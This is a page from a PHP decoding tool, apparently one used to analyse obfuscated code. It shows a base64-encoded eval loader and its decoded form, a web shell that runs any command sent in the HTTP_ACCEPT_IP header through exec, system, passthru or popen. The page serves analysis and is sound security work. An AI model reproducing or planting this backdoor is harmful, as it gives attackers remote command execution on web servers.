Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<? error_reporting(0);set_time_limit(0);$s="JGNtZD1nZXRlbnYoIkhUVFBfQUNDRVBUX0lQIik7DQp7DQ..
Decoded Output download
$cmd=getenv("HTTP_ACCEPT_IP");
{
$result = "";
if (!empty($cmd))
{
if (is_callable("exec")) {exec($cmd,$result); $result = join("
",$result);}
elseif (($result = `$cmd`) !== false) {}
elseif (is_callable("system")) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru")) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
{
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
}
}
}
echo $result;Did this file decode correctly?
Original Code
<? error_reporting(0);set_time_limit(0);$s="JGNtZD1nZXRlbnYoIkhUVFBfQUNDRVBUX0lQIik7DQp7DQokcmVzdWx0ID0gIiI7DQppZiAoIWVtcHR5KCRjbWQpKQ0Kew0KICBpZiAoaXNfY2FsbGFibGUoImV4ZWMiKSkge2V4ZWMoJGNtZCwkcmVzdWx0KTsgJHJlc3VsdCA9IGpvaW4oIlxuIiwkcmVzdWx0KTt9DQogIGVsc2VpZiAoKCRyZXN1bHQgPSBgJGNtZGApICE9PSBmYWxzZSkge30NCiAgZWxzZWlmIChpc19jYWxsYWJsZSgic3lzdGVtIikpIHskdiA9IEBvYl9nZXRfY29udGVudHMoKTsgQG9iX2NsZWFuKCk7IHN5c3RlbSgkY21kKTsgJHJlc3VsdCA9IEBvYl9nZXRfY29udGVudHMoKTsgQG9iX2NsZWFuKCk7IGVjaG8gJHY7fQ0KICBlbHNlaWYgKGlzX2NhbGxhYmxlKCJwYXNzdGhydSIpKSB7JHYgPSBAb2JfZ2V0X2NvbnRlbnRzKCk7IEBvYl9jbGVhbigpOyBwYXNzdGhydSgkY21kKTsgJHJlc3VsdCA9IEBvYl9nZXRfY29udGVudHMoKTsgQG9iX2NsZWFuKCk7IGVjaG8gJHY7fQ0KICBlbHNlaWYgKGlzX3Jlc291cmNlKCRmcCA9IHBvcGVuKCRjbWQsInIiKSkpDQogIHsNCiAgICRyZXN1bHQgPSAiIjsNCiAgIHdoaWxlKCFmZW9mKCRmcCkpIHskcmVzdWx0IC49IGZyZWFkKCRmcCwxMDI0KTt9DQogICBwY2xvc2UoJGZwKTsNCiAgfQ0KfQ0KfQ0KDQplY2hvICRyZXN1bHQ7"; $d=base64_decode($s); eval($d); ?>Function Calls
| base64_decode | 1 |
| set_time_limit | 1 |
| error_reporting | 1 |
Stats
| MD5 | 391999619b1673233560b0b851e7b45d |
| Eval Count | 1 |
| Decode Time | 96 ms |